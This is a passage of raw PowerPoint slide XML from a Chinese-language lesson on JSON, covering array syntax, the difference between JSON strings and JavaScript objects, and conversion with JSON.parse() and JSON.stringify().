              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>形式与语法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030682" y="2517083"/>
            <a:ext cx="22861705" cy="152397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algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>数组结构以”</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开始，”</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结束。中间由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>或多个以”，”分隔的值列表组成，语法结构如代码。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="4600" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uFillTx/>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="Helvetica Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="948391" y="4781167"/>
            <a:ext cx="6953404" cy="6953404"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9429135" y="6305143"/>
            <a:ext cx="12192000" cy="2923877"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="685800" indent="-685800" algn="l">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在方括号中（可理解为数组）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800" algn="l">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>方括号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>中每个数据以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对象形式出现</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800" algn="l">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>每</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>两个数据以逗号分隔（最后一个无需逗号）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="284109168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Shape 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030682" y="593429"/>
            <a:ext cx="6871113" cy="1251544"/>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en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>字符串和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对象</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030682" y="2112286"/>
            <a:ext cx="21770325" cy="4339650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对象的字符串表示法，它使用文本表示一个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对象的信息，本质是一个字符串。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>字符串：指的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>符合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>格式要求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>字符串。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> = {a: 'Hello', b: 'World'}; //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>这是一个对象，注意键名也是可以使用引号包裹的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对象：指符合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>格式要求的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对象</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pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> = '{"a": "Hello", "b": "World"}'; //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>这是一个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>字符串，本质是一个字符串</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030682" y="7867708"/>
            <a:ext cx="22389757" cy="3631763"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON 和 JS 对象互转</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>要实现从JSON字符串转换为JS对象，使用 JSON.parse() 方法：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON.parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>('{"a": "Hello", "b": "World"}'); //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>结果是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>{a: 'Hello', b: 'World</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>实现从JS对象转换为JSON字符串，使用 JSON.stringify() 方法：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
